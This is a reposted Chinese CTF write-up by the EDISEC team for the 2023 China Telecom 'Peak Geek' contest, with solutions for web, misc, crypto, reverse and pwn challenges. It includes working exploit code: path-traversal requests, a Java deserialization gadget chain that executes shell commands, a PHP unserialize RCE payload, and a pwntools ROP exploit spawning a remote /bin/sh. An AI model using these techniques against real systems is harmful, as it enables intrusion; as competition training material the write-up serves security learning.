中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

admin
admin
admin
138880
文章
114
评论
2023年7月21日12:54:58评论10 views字数 4018阅读13分23秒阅读模式

01

Web

1

hinder

鉴权绕过 非预期

//hinder/download.action?filename=../../../../../../../../../run.sh//hinder/download.action?filename=../../../../../../../../../oh_u_f1nd_me

2

url

package com.yancao.ctf.test;
import com.fasterxml.jackson.databind.node.POJONode;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import javassist.*;import javax.management.BadAttributeValueExpException;import java.io.*;import java.lang.reflect.*;import java.util.Base64;
public class exp {    public static void setValue(Object obj, String name, Object value) throws Exception{        Field field = obj.getClass().getDeclaredField(name);        field.setAccessible(true);        field.set(obj, value);    }    public static void main(String[] args) throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass clz = pool.makeClass("a");        CtClass superClass = pool.get(AbstractTranslet.class.getName());        clz.setSuperclass(superClass);        CtConstructor cc = new CtConstructor(new CtClass[]{}, clz);        cc.setBody("Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "cat /F14gIsHereY0UGOTIT > /tmp/file"});");        clz.addConstructor(cc);        byte[][] bytes = new byte[][]{clz.toBytecode()};        TemplatesImpl templates = TemplatesImpl.class.newInstance();        setValue(templates, "_bytecodes", bytes);        setValue(templates, "_name", "xxx");        setValue(templates, "_tfactory", null);        try {            CtClass jsonNode = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");            CtMethod writeReplace = jsonNode.getDeclaredMethod("writeReplace");            jsonNode.removeMethod(writeReplace);            ClassLoader classLoader = Thread.currentThread().getContextClassLoader();            jsonNode.toClass(classLoader, null);        } catch (Exception e) {        }        POJONode node = new POJONode(templates);        BadAttributeValueExpException val = new BadAttributeValueExpException(null);        setValue(val, "val", node);
        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);        objectOutputStream.writeObject(val);
        String payload = Base64.getEncoder().encodeToString(barr.toByteArray());//        System.out.println(payload);
        String encode = java.net.URLEncoder.encode(payload, "UTF-8");        System.out.println(encode);    }}
flag{QxJEF6FCgERtwaxAXbC5Fy5N47bjUCy7}

3

unserialize

字符串逃逸 无字母rce

root=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&pwd=";s:3:"pwd";O:7:"pull_it":1:{s:1:"x";s:21:"?><?=`/???/??? /**`;?>";}
02

Misc

1

FoundME

搜元数据flag 发现fffflag.avif  根据avif格式提取照片

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

2

song

flag is not here

图片里压缩包 password_hint

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

deepsound  123456

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

ook to text 压缩包密码

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

03

Crypto

1

密码一

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

在线画图

https://www.desmos.com/calculator?lang=zh-CN

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

flag{Funct10n_Fun}
04

Re

1

g0Reu

aes + 换表 + 加key 异或0x1a

#include <stdio.h>
int main(){unsigned char key[] = {0x77,0x76,0x67,0x69,0x74,0x62,0x79,0x67,0x77,0x62,0x6b,0x32,0x62,0x34,0x36,0x64};unsigned char enc[] ={  0xE6, 0xCE, 0x89, 0xC8, 0xCF, 0xC5, 0xF5, 0xC9, 0xD2, 0xD9,   0xC0, 0x91, 0xCE, 0x7F, 0xAC, 0xCC, 0xE9, 0xCF, 0xB7, 0xC0,   0x96, 0xD4, 0xEA, 0x92, 0xE2, 0xD7, 0xDF, 0x84, 0xCB, 0xA5,   0xAE, 0x93, 0xA6, 0xCA, 0xBE, 0x97, 0xDF, 0xCE, 0xF0, 0xC9,   0xB7, 0xE1, 0xAE, 0x6B, 0xC4, 0xB1, 0x65, 0xDB, 0xCE, 0xED,   0x92, 0x93, 0xD6, 0x8C, 0xED, 0xC3, 0xA3, 0xDA, 0x94, 0xA5,   0xAA, 0xB2, 0xB5, 0xA7, 0x55};    for ( int i = 0LL; 64 > i; ++i )  {  printf("%x",(enc[i] - key[i%16]) ^ 0x1a )  ;      }   return 0;}

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

05

Pwn

1

linkmap

#coding:utf8  from pwn import *  context.log_level='debug'# io=process('./ezzzz')io=remote("pwn-12b3fb054a.challenge.xctf.org.cn", 9999, ssl=True)

pop_rdi=0x4007E3pop_rsi=0x4007E1

pay=b'a'*0x10+p64(0x601c00)+p64(0x400752)io.send(pay)
sleep(1)pay=b'/bin/shx00'+p64(59)+p64(0x601c00)pay+=p64(pop_rdi)+p64(0x600fd8)+p64(pop_rsi)pay+=p64(1)*2+p64(0x400606)+p64(0x400510)
io.send(pay)
pay=b'/bin/shx00'+p64(59)+p64(0x601c00)pay+=p64(pop_rdi)+p64(0)+p64(pop_rsi)pay+=p64(0x601040)*2+p64(0x4004e0)+p64(0x400510)
sleep(0.5)io.send(pay)sleep(0.5)io.send('x90')
pay=b'/bin/shx00'+p64(59)+p64(0x601c00)pay+=p64(pop_rdi)+p64(0)+p64(pop_rsi)pay+=p64(0x6010d0)*2+p64(0x4004e0)+p64(0x4007DA)pay+=p64(0)+p64(1)+p64(0x601040)+p64(0)+p64(0)+p64(0x601c00-0x10)pay+=p64(0x4007C0)



sleep(0.5)io.send(pay)# gdb.attach(io)sleep(0.5)

io.send(b'a'*0x3b)
io.sendline('cat flag')io.recv()

io.interactive()

EDI安全

中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

 

原文始发于微信公众号(EDI安全):中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月21日12:54:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   中国电信2023巅峰极客网络安全技能挑战赛-WriteUp By EDISEChttps://cn-sec.com/archives/1898001.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息